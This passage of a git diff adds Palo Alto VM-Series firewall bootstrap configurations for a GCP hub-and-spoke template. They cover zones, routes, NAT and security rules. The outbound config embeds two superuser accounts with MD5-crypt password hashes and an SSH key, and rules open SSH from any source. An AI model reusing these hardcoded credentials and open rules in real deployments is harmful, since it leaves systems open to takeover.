+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="outbound">
+                    <nexthop>
+                      <ip-address>192.168.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spoke1">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.10.1.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spoke2">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.10.2.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+      </network>
+      <deviceconfig>
+        <system>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <hourly>
+                  <action>download-and-install</action>
+                  <at>15</at>
+                </hourly>
+              </recurring>
+            </threats>
+            <anti-virus>
+              <recurring>
+                <hourly>
+                  <action>download-and-install</action>
+                  <at>30</at>
+                </hourly>
+              </recurring>
+            </anti-virus>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>vm-series</hostname>
+          <dns-setting>
+            <servers>
+              <primary>208.67.222.222</primary>
+              <secondary>208.67.220.220</secondary>
+            </servers>
+          </dns-setting>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>no</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <server-verification>yes</server-verification>
+          <motd-and-banner>
+            <motd-enable>no</motd-enable>
+          </motd-and-banner>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <dns-primary>8.8.8.8</dns-primary>
+              <dns-secondary>4.2.2.2</dns-secondary>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="service-tcp-22">
+              <protocol>
+                <tcp>
+                  <port>22</port>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-221">
+              <protocol>
+                <tcp>
+                  <port>221</port>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-222">
+              <protocol>
+                <tcp>
+                  <port>222</port>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="all ping">
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>ping</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <log-start>yes</log-start>
+                  <log-end>yes</log-end>
+                  <action>allow</action>
+                </entry>
+                <entry name="inbound-web">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>web-browsing</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <log-start>yes</log-start>
+                  <log-end>yes</log-end>
+                  <action>allow</action>
+                </entry>
+                <entry name="inbound-ssh">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>ssh</member>
+                  </application>
+                  <service>
+                    <member>tcp-221</member>
+                    <member>tcp-222</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <log-start>yes</log-start>
+                  <log-end>yes</log-end>
+                  <action>allow</action>
+                  <disabled>no</disabled>
+                  <description>If required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222.</description>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules>
+                <entry name="inbound-80">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>service-http</service>
+                  <nat-type>ipv4</nat-type>
+                  <disabled>no</disabled>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke1-intlb</translated-address>
+                    <translated-port>80</translated-port>
+                  </dynamic-destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
+                </entry>
+                <entry name="inbound-221">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>tcp-221</service>
+                  <nat-type>ipv4</nat-type>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke1-vm</translated-address>
+                    <translated-port>22</translated-port>
+                  </dynamic-destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
+                </entry>
+                <entry name="inbound-222">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>tcp-222</service>
+                  <nat-type>ipv4</nat-type>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke2-vm</translated-address>
+                    <translated-port>22</translated-port>
+                  </dynamic-destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
+                </entry>
+              </rules>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="intrazone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+          </rulebase>
+          <profiles>
+            <vulnerability>
+              <entry name="Test Drive">
+                <rules>
+                  <entry name="simple-client-critical">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-client-high">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-client-medium">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-critical">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-high">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-medium">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                </rules>
+                <threat-exception>
+                  <entry name="31719">
+                    <action>
+                      <reset-client/>
+                    </action>
+                  </entry>
+                </threat-exception>
+                <description>WW's profile</description>
+              </entry>
+            </vulnerability>
+          </profiles>
+          <address>
+            <entry name="spoke2-vm">
+              <ip-netmask>10.10.2.2</ip-netmask>
+              <tag>
+                <member>spoke2-vpc</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-vm">
+              <ip-netmask>10.10.1.2</ip-netmask>
+              <tag>
+                <member>spoke1-vpc</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-vpc">
+              <ip-netmask>10.10.1.0/24</ip-netmask>
+              <tag>
+                <member>spoke1-vpc</member>
+              </tag>
+            </entry>
+            <entry name="spoke2-vpc">
+              <ip-netmask>10.10.2.0/24</ip-netmask>
+              <tag>
+                <member>spoke2-vpc</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-intlb">
+              <ip-netmask>10.10.1.100</ip-netmask>
+              <tag>
+                <member>spoke1-vpc</member>
+              </tag>
+            </entry>
+          </address>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <tag>
+            <entry name="spoke2-vpc">
+              <color>color3</color>
+            </entry>
+            <entry name="spoke1-vpc">
+              <color>color24</color>
+            </entry>
+            <entry name="untrust">
+              <color>color20</color>
+            </entry>
+            <entry name="trust">
+              <color>color13</color>
+            </entry>
+          </tag>
+          <profile-group/>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt
new file mode 100644
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes
new file mode 100755
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes
@@ -0,0 +1 @@
+ 
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml
new file mode 100644
index 00000000..90c524a9
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml
@@ -0,0 +1,706 @@
+<?xml version="1.0"?>
+<config version="8.1.0" urldb="paloaltonetworks">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$eyegmtyu$VFbNwpbaZ8sUG40wpdo/A/</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u</public-key>
+      </entry>
+      <entry name="paloalto">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+          </ethernet>
+          <loopback>
+            <units>
+              <entry name="loopback.1">
+                <adjust-tcp-mss>
+                  <enable>no</enable>
+                </adjust-tcp-mss>
+                <ip>
+                  <entry name="100.64.0.1/32"/>
+                </ip>
+                <interface-management-profile>health-check</interface-management-profile>
+              </entry>
+            </units>
+          </loopback>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="health-check">
+              <http>no</http>
+              <ssh>yes</ssh>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+              <member>loopback.1</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="health-probe-1">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>35.191.0.0/16</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="health-probe-2">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>130.211.0.0/22</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spoke1">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>10.10.1.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spoke2">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>10.10.2.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>no</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>PA-VM</hostname>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <dns-primary>8.8.8.8</dns-primary>
+              <dns-secondary>4.2.2.2</dns-secondary>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                  <member>loopback.1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service/>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="health-probe">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>gcp-health-probes</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <rule-type>universal</rule-type>
+                  <log-end>no</log-end>
+                </entry>
+                <entry name="east-west">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
